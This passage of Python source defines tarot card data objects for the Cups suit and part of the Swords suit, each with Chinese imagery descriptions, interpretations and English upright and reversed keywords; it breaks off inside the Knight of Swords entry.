intro='圣杯首牌是所有小牌的一号牌中最富象征意义的。图中的圣杯就是耶稣在最后晚餐中使用的杯子,杯上有个倒立的M字母。据说,在耶稣死后,他的鲜血就是由这个圣杯所承装着。\n\n白鸽是天主教中圣灵的象征,牠衔着象征耶稣身体的圣饼,自上而下彷佛要进入杯中。杯中有五道水涌出,下方的水面平静,只有少许涟漪,睡莲处处,睡莲茎长,向上伸展至水面。二十五滴水珠从四面落下,飘浮在空中。一只手从云中伸出,这只手和权杖一与宝剑一中的手截然不同,它是轻轻的捧着圣杯,而非用力抓住圣杯。', words='情感', desc='圣杯首牌意味情感的连接和满足。\n\n圣杯首牌正位是人际关系最好的开始,经常代表新感情的开端,对于人际关系是非常好的征兆。相对于权张首牌所代表的肉体上、体力上的开始,它暗示你已打开心扉接受新机会。它可能是一段新的两性关系,或既存关系的新阶段,或一种新层次的满足。此时正是你感觉情感满足的时刻。首牌描述的是透过感情和生活产生连接。你可能正经验着正立首牌的满足感或满意感。或许你正展开一项你全心期待的计划,或是一次旅行。', upright='New feelings, Spirituality, Intuition, Love, Emotional awakening, Creativity', reversed='Emotional loss, Blocked creativity, Emptiness, Coldness, Feeling unloved, Gloominess' ), init=False) two_of_cups: TarotCard = field(default=TarotCard( id=37, index='two_of_cups', type='minor_arcana', orig_name='Two of Cups', name='圣杯二', intro='一男一女面对彼此,向对方持杯致意。两人头上都戴着花环,男人身躯微微向前,左脚踏出,右手也伸向女人,而女人站姿端凝如山。他们中间浮着一根两条蛇缠绕的杖,称为“赫米斯之杖”,是治疗的象征。杖上的狮子头象征沟通,而两片翅膀象征圣灵,使人联想到恋人牌中的天使。远方是一座城镇。', words='平等', desc='圣杯二意指一种平等的伙伴关系或两性关系。\n\n圣杯二意指一种心灵上的契合。它形容一种既丰富又有创意的友谊或两性关系。其实,圣杯二讲的就是这两种力量的结合,若能同时拥有两种力量,且融合良好的话,会比单一力量更强大。当牌局中出现此牌时,它意味着连结你和对方的特质,那么你可能会获得某些比你单打独斗的成就还要来得大的东西。', upright='Unity, Partnership, Connection, Attraction, Close bonds, Joining forces, Mutual respect', reversed='Imbalance, Broken communication, Tension, Separation, Rejection, Division, Bad communication, Withdrawal' ), init=False) three_of_cups: TarotCard = field(default=TarotCard( id=38, index='three_of_cups', type='minor_arcana', orig_name='Three of Cups', name='圣杯三', intro='三个女子紧靠彼此,围成圆圈,高举圣杯互相庆贺。她们头上都戴着象征丰收的花圈,穿着色彩艳丽的袍子,脸上幸福洋溢。四周有藤蔓、葫芦及南瓜,一位女子手上提着一串葡萄,这些植物很容易让人联想到丰收的时节。这三位女子分别有不同颜色的头发与眼珠,穿戴的衣服花环也都各有不同,代表她们都是独立的个体,有独立的个性,但是,在这个团体中,她们都能尊重彼此,敬爱彼此。三人围成圆圈的型态,表示她们之间没有尊卑之分,在这个欢庆的场合里,每个人都是如此平等。', words='团聚', desc='圣杯三意味庆贺或重聚。\n\n圣杯三意指欢乐、分享或庆贺。圣杯三是一张代表庆祝、团圆或当所有参与者带来欢乐的一场聚会。这杖牌可一暗示由三人或更多的人来分享成功。圣杯三意味着一段庆祝的时光,一群志同道合的人们相聚,或代表这是个重大隆盛的晚宴。\n\n圣杯三也经常代表欢庆的场合,举凡各种宴会、聚餐、婚礼、弥月、尾牙、庆功宴等都算在内。其丰收的涵义表示事情有了好的结果,不管过程曾经有多艰辛。因此,圣杯三象征丰收的时节,长久的辛苦终于开花结果,获得成功。', upright='Friendship, Community, Happiness, Gatherings, Celebrations, Group events, Social events', reversed='Overindulgence, Gossip, Isolation, Scandal, Excess, Loneliness, Solitude, Imbalanced social life' ), init=False) four_of_cups: TarotCard = field(default=TarotCard( id=39, index='four_of_cups', type='minor_arcana', orig_name='Four of Cups', name='圣杯四', intro='一个男人百无聊赖地坐在树下,双眼紧闭,双手双脚合在一起,形成防御的姿态。他前方三个杯子象征他过去的经验。云中伸出一只手给他第四个杯子,他却视而不见,独自沉浸在自己的世界中。', words='不满', desc='圣杯四暗示要留意目前感情上的机会。\n\n圣杯四在告诉我们,应该睁开我们的双眼,在那些机会自眼前溜走之前好好的把握住它们。当你内心感到越充实时,你对外在的需求则越少。你越深思熟虑或将焦点放到内心,你就需要越稳定的基础(或与土地有更强的连结)来平衡你自己。\n\n这张牌带有一种沉闷及不悦的感觉,可能是求问者的生活日日如是,一成不变。其实生活未如想像般单调乏味的,只要求问者肯开阔视野,有些意料不到的事情便会发生。', upright='Apathy, Contemplation, Disconnectedness, Feeling disconnected, Melancholy, Boredom, Indifference, Discontent', reversed='Sudden awareness, Choosing happiness, Acceptance, Clarity, Awareness, Depression, Negativity' ), init=False) five_of_cups: TarotCard = field(default=TarotCard( id=40, index='five_of_cups', type='minor_arcana', orig_name='Five of Cups', name='圣杯五', intro='在灰暗的天空底下,有一个人身着黑色斗篷,低头哀悼地上三个倾倒的杯子,里头五颜六色的酒流了出来。他的前方是一条河,象征悲伤之流,但河上有座象征意识与决心的桥,通往远处的房子。灰暗的天色反映牌中人的沮丧的内心世界。从图面上无法分辨出这人是男是女,显示悲伤的情绪无论男女皆能体验。', words='悲观', desc='圣杯五代表在痛苦中回转身,寻找新的机会。\n\n圣杯五形容失落和悲伤。它可能是张代表分离的牌,或者有种和人生疏离的感觉。这段期间内,那些平稳而熟悉的事物似乎都逃离你了。在新机会现身前,你必须经历这段失落或孤立期。这张牌和所有的“五”(包括隐士牌)一样,在正立时都代表心胸窄狭,而倒立时,则有心胸宽大的意味。', upright='Loss, Grief, Self-pity, Disappointment, Sadness, Mourning, Discontent, Feeling let down', reversed='Acceptance, Moving on, Finding peace, Contentment, Seeing positives' ), init=False) six_of_cups: TarotCard = field(default=TarotCard( id=41, index='six_of_cups', type='minor_arcana', orig_name='Six of Cups', name='圣杯六', intro='在一座宁静安详的庄园里,有六个盛装星币花朵的圣杯。一个小男孩捧着圣杯,似乎在嗅着花香,又好像把圣杯献给小女孩。背景充斥代表快乐的鲜黄色,而天气晴和。让人彷佛有置身童话世界的感受。', words='安全', desc='圣杯六代表童真环境下的保障和安全。\n\n圣杯六描绘的是一种温柔而隐秘的情景,其中有某种程度的保障和安全,它带有一种可预知性。保障和安全倍受珍惜,不过这是以极高的代价换来的。因为没有什么冒险,所以通常没什么成长。\n\n圣杯六暗示以成长为代价而得到保障、安全和亲密。它可以意指你的居家或家庭状态的稳定。也可能是过去的事物或人们又出现了,等着你去处理。他也可以代表一种舒适的状态,让你有时间静下来,重新关注活力或安顿下来。', upright='Familiarity, Happy memories, Healing, Nostalgia, Memories, Comfort, Sentimentality, Pleasure', reversed='Moving forward, Leaving home, Independence, Stuck in past' ), init=False) seven_of_cups: TarotCard = field(default=TarotCard( id=42, index='seven_of_cups', type='minor_arcana', orig_name='Seven of Cups', name='圣杯七', intro='七个圣杯飘浮在云雾弥漫的半空中,杯中分别装着城堡(象征冒险)、珠宝(财富)、桂冠(胜利)、龙(恐惧,另一说是诱惑)、人头、盖着布发光的人(自己)以及蛇(智慧,另一说是嫉妒)。请注意桂冠的下方有颗不显眼的骷髅头,成功与死亡并存,似乎在给人什么警惕。有个人面对着这些圣杯,不知该如何选择,他的身体姿态似乎流露出些微恐惧。', words='梦想', desc='圣杯七代表应该认知你内在需求。\n\n圣杯七代表的是生活中的非现实层面,包括我们的梦境、幻想与白日梦,或是偶而异想天开的点子。这种想像通常只是空中楼阁,一般人不会真的把这些幻想付诸行动,因此圣杯七不是一张代表行动的牌,而只是一种个人想像的心理状态而已。这张牌描述的是:该去想想什么是你生活重要的部分。它显示出检视环境来确认你正走在通往满足之路的过程中。圣杯七意味着深思内在生活,已进行精神或情感的回顾。\n\n圣杯七是一张代表自我发现、心灵成长以及认识内在需求的牌。提醒你,充分了解自己与自己的行动,你需要行动,也需要思考。对行动有所思考能帮助你将直接的经验转变为知识,并更向智慧与理解靠近。没有思考,行动很快就会变得重复,而没有行动与经验,思考则可能变的索然无味,且毫无意义。这张圣杯七代表你需要向内探索自己,以追求所有爱的来源。你应该确认你所真正需要的是什么,并发现什么东西足以添满你的感情。', upright='Searching for purpose, Choices, Daydreaming, Illusion, Fantasy, Wishful thinking, Indecision', reversed='Lack of purpose, Diversion, Confusion, Disarray, Distractions, Clarity, Making choices' ), init=False) eight_of_cups: TarotCard = field(default=TarotCard( id=43, index='eight_of_cups', type='minor_arcana', orig_name='Eight of Cups', name='圣杯八', intro='身穿红衣红鞋的男子在暮色中,手持长杖,离开他先前辛苦建立的的八个杯子,越过河川,转身而去。四周沼泽密布,象征淤塞的情感,如同一滩死水。', words='突破', desc='圣杯八意味你已经突破某种状况,并显示你要追寻更多的东西。\n\n这张牌代表为了追寻一种新的满足,而放弃既有的满足方式。或许你正打算离职去找一个更有价值的工作,或者你正从你的爱的关系中撤退去寻找更深层的幸福。\n\n圣杯八意味着你正超越某人,或突破某特定状况。它表示一个人光理解还不够,还包括离开一种稳定的状态(圣杯六),去发现圣杯十所提供的满足感。没有任何人事物强迫你放弃目前的状态,除了你内心想达到更强烈满足的需求。要圆满的挑战成功,需要内在的力量,当八出现时,你就会拥有相对的勇气和力量。在大阿尔克纳牌中,第八张是力量牌。而所有塔罗牌的八也都和力量有关。', upright='Walking away, Disillusionment, Leaving behind, Abandonment, Letting go, Searching for truth', reversed='Avoidance, Fear of change, Fear of loss, Stagnation, Monotony, Accepting less, Staying in bad situation' ), init=False) nine_of_cups: TarotCard = field(default=TarotCard( id=44, index='nine_of_cups', type='minor_arcana', orig_name='Nine of Cups', name='圣杯九', intro='一个财主装扮的的男子坐在小凳上,双手抱胸,神情怡然自得。他身后的高桌上,覆盖蓝色桌布,九个圣杯排排站。背景则是一片光明的鲜黄色。', words='满足', desc='圣杯九意味对自己的满意和荣耀感。\n\n圣杯九的昵称叫做美梦成真,代表当事人的愿望极有可能实现,无论是精神或是物质方面。这张牌表示你了解自己真正的价值,而且就是你的价值造就了今天的你。\n\n圣杯九形容一种对能圆满达成工作而感到的骄傲和满足。你内心所拥有幸福和喜悦的感觉,可能是来自于你的工作环境、人际关系,或是来自一种心灵上的成就感。现在你内在的需求已经得到满足了,而你也能思考你所赢得的成功。在这张九牌当中有着从你对自己的爱里头所滋长出来的快乐、满足和平静。', upright='Satisfaction, Emotional stability, Luxury, Wishes coming true, Contentment, Success, Achievements, Recognition, Pleasure', reversed='Lack of inner joy, Smugness, Dissatisfaction, Unhappiness, Lack of fulfilment, Disappointment, Underachievement, Arrogance, Snobbery' ), init=False) ten_of_cups: TarotCard = field(default=TarotCard( id=45, index='ten_of_cups', type='minor_arcana', orig_name='Ten of Cups', name='圣杯十', intro='在卡面中我们看到一家四口和乐融融,父母亲搂抱对方,各举一只手迎向圣杯彩虹,两个孩子快乐的手牵手跳舞,背景是清翠的树木河流,和一栋房屋。', words='家庭', desc='圣杯十意味一个互利的团体或家庭状态。\n\n圣杯十是一张表示欢乐和分享的牌。它通常是在描述一个团队或家庭,他们在身体及精神上都能相互奉献及合作,并且共享所有的利益。圣杯十形容一个家庭或团体,而其中的每个人均能受益。因为每个人都坦然的付出和接受,因而团体的气氛和谐,大家也乐于付出。它暗示对家庭或工作环境(包括团队合作和分享)有所付出。这张是意味一个成功的家庭状态或聚合,其中每位参与者都充分的感受到对这个团体的归属感。', upright='Inner happiness, Fulfillment, Dreams coming true, Happiness, Homecomings, Emotional stability, Security, Domestic harmony', reversed='Shattered dreams, Broken family, Domestic disharmony, Unhappy home, Separation, Domestic conflict, Disharmony, Isolation​' ), init=False) page_of_cups: TarotCard = field(default=TarotCard( id=46, index='page_of_cups', type='minor_arcana', orig_name='Page of Cups', name='圣杯侍从', intro='圣杯侍从穿着花朵图案的衣服,身体很轻松地站着,左手叉腰,面带微笑,用好奇的眼光,没有任何压力地看着圣杯中蹦出的一条鱼。', words='奉献', desc='圣杯侍从意味有益于情感的奉献。\n\n圣杯侍从是想像力最丰富的孩子。他天真无邪,敏感细心,直觉性强,爱好幻想,好奇心重,甜美可人,喜欢作梦,常常问一些让人想都想不到的问题。他很随和,合作性高,可靠,关心别人的威受,也乐意为他人服务。这样的性格形成一位善解人意、敏感,多愁善感,强调感情交流互动的人。他认真对待他人,对於所爱的人更是忠诚。他也是一位勤勉好学和专心致志的人,自动自发地提供服务朝向特定目标努力,他热心助人,是值得信赖的好帮手,更是良好的工作伙伴。\n\n塔罗牌中的侍从牌都和学习有关,而且由于圣杯组牌涉及情感和直觉,所以这张牌可能意味着透过冥想,或其他任何类似的被动方式来进行心灵上的学习或发展。圣杯侍从代表一段新关系或圣以合伙关系的到来。一个让情感得到满足的机会。', upright='Happy surprise, Dreamer, Sensitivity, Idealism, Naivete, Innocence, Inner child, Head in the clouds', reversed='Emotional immaturity, Insecurity, Disappointment, Emotional vulnerability, Immaturity, Neglecting inner child, Escapism' ), init=False) knight_of_cups: TarotCard = field(default=TarotCard( id=47, index='knight_of_cups', type='minor_arcana', orig_name='Knight of Cups', name='圣杯骑士', intro='不同于权杖骑士或宝剑骑士的迅捷骑马姿态,圣杯骑士的白马很有绅士风度,优雅地行进,跟主人一样。圣杯骑士平举着圣杯,他的眼光有些梦幻,深深注视着圣杯。', words='选择', desc='圣杯骑士意味在感情和行动之间做出决定。\n\n圣杯骑士暗示来自某人的供给。它可能是指情感上的奉献,或某种更为实际的事物。它可能是指情感上的付出,或某种更为实际的事物。骑士也意味着一段决定是否等待或行动,让事情充分发展或找寻新机会的时期。为了发现满足,或许现在是随着心意(河流的象征)而为的时候了。', upright='Following the heart, Idealist, Romantic, Charming, Artistic, Graceful, Tactful, Diplomatic, Mediator, Negotiator', reversed='Moodiness, Disappointment, Tantrums, Turmoil, Avoiding conflict, Vanity' ), init=False) queen_of_cups: TarotCard = field(default=TarotCard( id=48, index='queen_of_cups', type='minor_arcana', orig_name='Queen of Cups', name='圣杯皇后', intro='圣杯皇后双手捧着圣杯,眼神直直的注视着圣杯。那圣杯是教堂形状,两臂各有一位天使,顶端是十字架,象征圣杯皇后的虔诚。她坐在海边的宝座上,宝座基部有个小美人鱼抓鱼的图案,顶部是两个小美人鱼共同抱着一个大蚌壳。', words='倾听', desc='圣杯皇后意味透过倾听直觉而成功。\n\n圣杯皇后意味透过倾听感觉,以及利用富创意的想象力而获得成功。她从经验得知,杂乱无章的想象所产生的结果通常是有限的,因此它可以将精力用在对身体、情感、精神及心灵上都相当有价值的行动上。虽然她可能显得温柔又细心,但眼神却意味着一种坚强的意志。爱调和她的意志,并增加个性上的深度。她带着爱心和怜悯行事,而且常常展现出浓浓的家庭感情。如果发生问题,她可能不会说出她的感觉,但仍然会对周遭的人给于支持,把自己的感情的困扰放在一边。', upright='Compassion, Calm, Comfort, Warmth, Kindness, Intuition, Healer, Counsellor, Supportive', reversed='Martyrdom, Insecurity, Dependence, Giving too much, Overly-sensitive, Needy, Fragile' ), init=False) king_of_cups: TarotCard = field(default=TarotCard( id=49, index='king_of_cups', type='minor_arcana', orig_name='King of Cups', name='圣杯国王', intro='国王坐在波涛汹涌海中央的宝座上,左边有条鱼跳出海面,右边有一艘帆船。他的内袍是代表水要素的蓝色,胸前还挂著鱼形项链。他左手拿著象征权力的杖,右手持圣杯,他却是圣杯家族中唯一不注视圣杯的人。', words='创作', desc='圣杯国王暗示透过创造和情感上的训练而成功。\n\n圣杯国王展现深度和理解力,他适合一个以满足他人的需求为主的位置。他感情已经成熟到能够清楚的考虑别人和自己的需求,而且常常以家庭及环境中的共同参与感为荣。\n\n圣杯国王暗示透过情感和创作上的训练而成功,经由落实精力在有创作的目标上,可以达到所追寻的成功。一种成熟、有创意的方法带来琛功,尤其是在创造和艺术的努力上。这张国王牌暗示你应该信赖你本能——别放弃。它暗示一种坚强又冷静的方式。想象加灵感,再加上实际的努力就会得到回报。', upright='Compassion, Control, Balance, Wise, Diplomatic, Balance between head and heart, Devoted, Advisor, Counsellor', reversed='Coldness, Moodiness, Bad advice, Overwhelmed, Anxious, Cold, Repressed, Withdrawn, Manipulative, Selfish' ), init=False) ace_of_swords: TarotCard = field(default=TarotCard( id=50, index='ace_of_swords', type='minor_arcana', orig_name='Ace of Swords', name='宝剑首牌', intro='一只手从云中伸出,紧紧握住宝剑,宝剑穿过皇冠与桂冠,而远方是毫无绿意的尖锐山头,以及灰白空旷的天际。', words='思想', desc='宝剑首牌代表毅然决然的行动,开始计划一项新的冒险。\n\n宝剑首牌代表的是一个开始,时涉及以相信冒险或方案的行动。权杖首牌描述身体上的行动,杯子牌的首牌则是情感上的行动,而这张首牌叙述一个意念的形成,或是为未来的行动所准备的计划。这张牌代表清晰的思考,或明确的了解到完成一项计划所需要的是什么。\n\n同时这把双面的宝剑强调着现实、成就与成功所必须负担的责任和应得的报酬。宝剑一只是一个开端,一种可能。未来究竟要如何发展,掌握在持剑者的手中。', upright='Breakthrough, Clarity, Sharp mind, New idea, Concentration, Vision, Force, Focus, Truth', reversed='Confusion, Brutality, Chaos, Miscommunication, Hostility, Arguments, Destruction' ), init=False) two_of_swords: TarotCard = field(default=TarotCard( id=51, index='two_of_swords', type='minor_arcana', orig_name='Two of Swords', name='宝剑二', intro='身穿浅灰长袍的女人坐在灰石凳上,背对着澎湃汹涌、暗礁满布的海洋。她眼蒙白布,双手持剑,在胸前交叉不动。天际高挂一轮新月。', words='抉择', desc='宝剑二意味着做出一个决断,无论对与错,不要试图逃避。\n\n宝剑意味为你需要作决定或在两个选择当中择其一。这是二则一的抉择,或许在目前这个阶段,你对于所做的选择会产生怎样的结果,洞察力还不够。你在做决定的时候,并没有对你的环境做通盘的考虑,或者是,你没有考虑到你的抉择会带来怎样的结果。\n\n正视你所恐惧的,如此你才能明了你周遭事物对你有什么意义。一个正确决定的报偿正等着你,它的第一个回报是解脱感,这解脱感来自于你能够锁定一个方向。', upright='Difficult choices, Indecision, Stalemate, Stuck in the middle, Denial, Hidden information', reversed='Lesser of two evils, No right choice, Confusion, Indecision, Hesitancy, Anxiety, Too much information, Truth revealed' ), init=False) three_of_swords: TarotCard = field(default=TarotCard( id=52, index='three_of_swords', type='minor_arcana', orig_name='Three of Swords', name='宝剑三', intro='映入眼帘的是一幅令人痛苦的画面。即使是完全没有接触过塔罗牌的朋友,也可以轻易道出宝剑三的涵义──伤心。三把剑合力刺进一颗鲜红的心,背景是灰暗的雨和云。某些版本的塔罗牌给这张牌一个更直接的名称,叫做“悲伤”。', words='悲伤', desc='宝剑三意味着伤心在所难免,请接受你的痛苦和悲伤。\n\n宝剑三代表的是,你正强烈的经验这悲伤和失落的一段时间。当出现这张牌时,内心的困惑、悲痛和沉重是很明显的,它表示强烈的失望。但你要知道:去体验你的悲伤是很重要的,因为在这么做的同时,你也扫除了障碍,让即将到来的机会可以接近你。记住,悲伤是会过去的。\n\n虽然痛苦,但我们要看破痛苦的假象。宝剑三凌空的心,告诉我们需要再去深入思考,以获得解脱和更深的觉醒,三把宝剑只是一种试炼,这颗心也可以是一种假托,而不是我们真正的心灵。以承受和接纳的态度,来化解宝剑成为优美的思考认知。', upright='Heartbreak, Suffering, Grief, Separation, Sadness, Sorrow, Upset, Loss, Trauma, Tears', reversed='Recovery, Forgiveness, Moving on. healing, Reconciliation, Repressing emotions' ), init=False) four_of_swords: TarotCard = field(default=TarotCard( id=53, index='four_of_swords', type='minor_arcana', orig_name='Four of Swords', name='宝剑四', intro='图中的男人在类似修道院的建筑物内休息,双手合抱胸前,呈现安详的状态。彩绘玻璃表现一个祈祷者跪在圣母面前的画面,好像在寻求什么建议,以获得内心的宁静。三把宝剑挂在墙上不用,但他身旁仍保有一把宝剑,当他醒来,随时可以拿起宝剑来采取行动。', words='沉思', desc='宝剑四暗示在危机中安静的思考,退隐中的深思熟虑。\n\n\n宝剑四这张牌可能象征自生活中撤离:身体上退隐到自家当中,或在精神上退隐到梦想和幻想当中。这是一张反省过去行为和计划未来的牌。他说明精神层面的巩固:采取让过去行为有意义的行动,以及排除那些已经被证实为不正确、或没有建设性的想法和信念。如此一来就有可能运用过去的经验来帮助你获得未来的成功。在经历了宝剑三的痛苦之后,随之而来的是对你自己和你的人生有更深层的了解。', upright='Rest, Restoration, Contemplation, Relaxation, Peace, Sanctuary, Recuperation, Self-protection, Rejuvenation', reversed='Restlessness, Burnout, Stress, Recovery, Awakening, Re-entering world, Release from isolation' ), init=False) five_of_swords: TarotCard = field(default=TarotCard( id=54, index='five_of_swords', type='minor_arcana', orig_name='Five of Swords', name='宝剑五', intro='红发的男子右手抱着两把剑,左手拄着另一把,回头注视远方两个失败者,嘴角似乎带着微笑。很明显的,他们刚结束一场争执,也许暴力相向。地上还散落着两把剑。另外两人中,一人怅然离去,一人用手摀着脸,似乎难以接受,或者感到伤心羞辱。天空中被风吹散的云彷佛也在说着他们争执的故事,看来很不宁静。', words='纷争', desc='宝剑五意味误会加深,争吵和紧张,解决的机会十分渺茫。\n\n宝剑五这张牌代表争吵、紧张和冲突,这可能使指你与自己内在的交战,或和你周遭人的不协调。假如这个冲突是指你和别人的,则其前提很有可能来自你的思想。在这种冲突的情况下,每个人对于事情的解决方法都各有见地,却没有人愿意聆听他人的心声。', upright='Unbridled ambition, Win at all costs, Sneakiness, Arguments, Disputes, Aggression, Bullying, Intimidation, Conflict, Hostility, Stress', reversed='Lingering resentment, Desire to reconcile, Forgiveness, Reconciliation, Resolution, Compromise, Revenge, Regret, Remorse, Cutting losses' ), init=False) six_of_swords: TarotCard = field(default=TarotCard( id=55, index='six_of_swords', type='minor_arcana', orig_name='Six of Swords', name='宝剑六', intro='一艘小船上插着六把宝剑,船上有一个女人、一个小孩与一位船夫。\n\n船缓缓的朝远方的岸边前进,而此端的水汹涌,彼方的水平静。象征伤害的六把剑插在船身上,以及三个主角哀伤的背影,构成宝剑六缓慢低回的基调。沉重的剑身让船夫只能缓行,疗伤的过程亦同。但是我们不能把宝剑抽起,否则船会沉,正如我们不能把过去的哀伤连根拔起,只能轻轻的抚平。也许你该庆幸,这些宝剑并不能使船沉没。', words='平静', desc='宝剑六暗示远离是非,在混乱之后,逐渐回复平静。\n\n这是受伤后康复的过程,不管伤多重,总是能痊愈。水象征情绪,这端汹涌的水是你烦扰的过去,前方大片平静的水面,预示未来安详的情绪。船夫手持黑色长篙,黑色象征潜质,将来什么都还是可能发生,不要将自己困死了。宝剑六是一个信道,领你向未来的幸福快乐前进,光明的日子就在前方。\n\n这张牌暗示你正带着你的剑(问题),从过去走向未来。或许你根本没注意到它们,然而它们却是与你紧紧相随。这是一个从艰困时刻过渡到一个较为平衡状态的过程。即使现时的问题及困难如何复杂,最终都会得到解决,求问者届时心情自然轻松不少。宝剑六可能是在说明当你转移向新的经验时,你也正慢慢的远离困境,情绪从过去释放出来。', upright='Transition, Leaving behind, Moving on, Departure, Distance, Accepting lessons', reversed='Emotional baggage, Unresolved issues, Resisting transition, Stuck in past, Returning to trouble, Running away from problems, Trapped' ), init=False) seven_of_swords: TarotCard = field(default=TarotCard( id=56, index='seven_of_swords', type='minor_arcana', orig_name='Seven of Swords', name='宝剑七', intro='图中的男子身处军营中,趁着远方敌人炊饭没有防备时,悄悄偷走五把剑,还留着两把在原处。', words='逃避', desc='宝剑七意味另辟蹊径,若要成功的话,需要一种新的方法。\n\n宝剑七所传达的讯息是:不要放弃。去找寻另一种可以达成目标的方法吧。坐下来,检查一下你所有的选择,以便发现先前未曾预见的可能性。你当然还有时间来完成你的愿望,然而在方法上需要更有弹性,各种行动的不同组合方式,就有可能会带来不同的结果。\n\n宝剑七暗示经由审慎评估各种可能,你就能找到有效的解决之道。透过详细的规划和不放弃的决心,你就能得到更多。比如你目前正汲汲营营于某件重要的事,理智所提供的解决方案会让你不需要如此费劲。\n\n宝剑七同时也是一张秘密、隐藏动机和不坦诚的牌。牌中暗示求问者欲逃避一段令他不愉快的事情,这件事可能会令他有金钱损失或与面子有关,求问者若肯勇敢面对,并应用智慧及交际手段去补救。', upright='Deception, Trickery, Tactics and strategy, Lies, Scheming, Strategy, Resourcefulness, Sneakiness, Cunning', reversed='Coming clean, Rethinking approach, Deception, Confession, Conscience, Regret, Maliciousness, Truth revealed' ), init=False) eight_of_swords: TarotCard = field(default=TarotCard( id=57, index='eight_of_swords', type='minor_arcana', orig_name='Eight of Swords', name='宝剑八', intro='一个女人眼睛被布蒙住,上半身被捆绑着,身处八把宝剑群中。地上满是象征羞辱的泥泞,而远方是座矗立于峭壁之上的城堡,象征绑住她的权威。', words='限制', desc='宝剑八暗示限制及丧失个人的能力。\n\n宝剑八代表的是你被限制住的一段时间,或是在某种情况下你失去个人的能力。你觉得动弹不得,受到限制,而且没有办法看清楚你前面的路。\n\n塔罗牌的“八”是代表力量的牌。而对于宝剑八里面的女人,这份力量源自于倾听她内在的声音的能力。双眼被蒙蔽让她无法透过视觉来做判断,她显得那么的无能为力,然而第一眼看上去这是个阻碍,但其实却是助力。阻碍那个女人控制自己所处环境的力量,却使得她能够走进自己的内心世界倾听内在的声音,并且留心它所发出的指令。如果你想做出有效率的决定,现在是留心你的自我精神层次的时候了。\n\n去探索那等待着你的道路吧,利用你内在的力量和个人的能力,将自己从目前的情况中释放出来,并且把那些曾经屈服于他人的个人能量重新召唤回来。你的信念其实才是你最大的限制。好好自省并检视这些信念,因为事实上目前的“眼罩”是在帮助你,因为它可以让你不会分心。', upright='Imprisonment, Entrapment, Self-victimization, Trapped, Restricted, Victimised, Paralysed, Helpless, Powerless', reversed='Self acceptance, New perspective, Freedom, Release, Taking control, Survivor, Facing fears, Empowered, Surrender' ), init=False) nine_of_swords: TarotCard = field(default=TarotCard( id=58, index='nine_of_swords', type='minor_arcana', orig_name='Nine of Swords', name='宝剑九', intro='午夜梦回,一个女子从睡梦中惊醒,把脸埋在双手中。墙上横挂着九把剑,看起来彷佛从后面刺穿那女子,带给人极大的压迫感。棉被图案是由象征热情的玫瑰,以及星座符号组成的。床侧则雕刻着一人击败另一人的画面。', words='梦魇', desc='宝剑九暗示由梦境传达的直觉,或对问题的担心。\n\n宝剑九代表的是强烈的梦。或许你的潜意识正努力教导你某些事情,去倾听你的梦境。宝剑九是一张代表担心和情绪骚动的牌。这种担心可能是对自己或周遭的一切。也可以代表鲜明的梦境或梦魇,而梦魇则可能是在传达一种强烈的讯息,即你生命当中某些不对劲的事物,已由潜意识而浮现在你的意识层面了。\n\n假设你将你的梦境写成日志,或许会发现一个共同的线索或是明显的讯息。那么你的梦就可以变成一项接近你潜意识的有效工具了。', upright='Anxiety, Hopelessness, Trauma, Fear, Negativity, Breaking point, Despair, Nightmares, Isolation', reversed='Hope, Reaching out, Despair, Recovery, Learning to cope, Facing life, Finding help, Shame, Guilt, Mental health issues' ), init=False) ten_of_swords: TarotCard = field(default=TarotCard( id=59, index='ten_of_swords', type='minor_arcana', orig_name='Ten of Swords', name='宝剑十', intro='一个俯卧的男人,背上插着十把剑,有一把甚至从插进耳朵里去。这画面实在令人怵目惊心。牌面中有一半被黑色的天空和乌云所占去,多少暗示宝剑十这张牌是大家避之唯恐不及的所谓的“坏牌”。', words='失败', desc='宝剑十意味着痛苦挥之不去,在另一个开始之前某种状况的结束。\n\n这张牌暗示在某种情况下,你已到了最低潮的时刻,你也可能是被一些无用的事物,或对生命具破坏性的信念给绊住了。但远方微弱的阳光暗示着,尾随这艰困时刻的将会是新的以及更好的事物。你对人生的思想或信念导致你此刻的境遇,从这里,你的思想将会带领你到任何你认为能够去的地方。\n\n宝剑十代表一种情况的结束。可能指两性关系的结束,或某关系中的一个阶段的结束,或一项事业的失败。你生命中的某些事物已经结束了,虽然这毫无疑问的会是一段艰难的时期,不过好消息是,它终究会过去,接受这个事实有助于新事物来取代旧的的。', upright='Failure, Collapse, Defeat, Ruin, Bitterness, Exhaustion, Dead end, Victimization, Betrayal', reversed="Can't get worse, Only upwards, Inevitable end, Survival, Improvement, Healing, Lessons learned, Despair, Relapse" ), init=False) page_of_swords: TarotCard = field(default=TarotCard( id=60, index='page_of_swords', type='minor_arcana', orig_name='Page of Swords', name='宝剑侍从', intro='宝剑侍从两手握著宝剑,眼光却朝著远方。他的头发和背景中的树都被风吹得飞扬。远方天空中有十只小鸟成群飞舞。背景灰云带来些许混乱的气氛', words='幻想', desc='宝剑侍从象征太多的梦想,而行动却不够。\n\n你可以发现到这个侍从双脚离地甚远,这个思考敏捷的年轻人喜欢说话、有很多点子和创新的概念,而这些成双出现的点子却无法搭在一起。这表示一种生活的态度,这种态度要求你透过梦境和思想让自己从现实抽离出来。\n\n宝剑侍从可能代表有关你目前所拥有的一个构想或计划的消息。但却没有付诸行动。对那些依赖创意和思考维生的人而言,这可说是一张正面的牌,但是也可能暗示脚踏实地是必要的,假设你想生产实际或有形的东西。', upright='Curiosity, Restlessness, Mental energy, Curious, Witty, Chatty, Communicative, Inspired, Vigilant, Alert, Mental agility', reversed='Deception, Manipulation, All talk, Scatterbrained, Cynical, Sarcastic, Gossipy, Insulting, Rude, Lack of planning' ), init=False) knight_of_swords: TarotCard = field(default=TarotCard( id=61, index='knight_of_swords', type='minor_arcana', orig_name='Knight of Swords', name='宝剑骑士', intro='宝剑骑士和圣杯骑士同样骑着白马,但宝剑骑士这匹马在狂风中极速奔驰,与圣杯骑士平缓前进的马形成强烈对比。宝剑骑士将宝剑高举过头,表情狰狞,向前冲杀。马鞍上饰以蝴蝶和鸟,象征风要素。他穿着铁甲,外袍也有鸟的图案,而靴子前后都带着尖刺,在战场上毫不留情。云和树都被狂风吹得七零八落。空中飞翔的鸟,队形也略显散乱。', words='急躁', 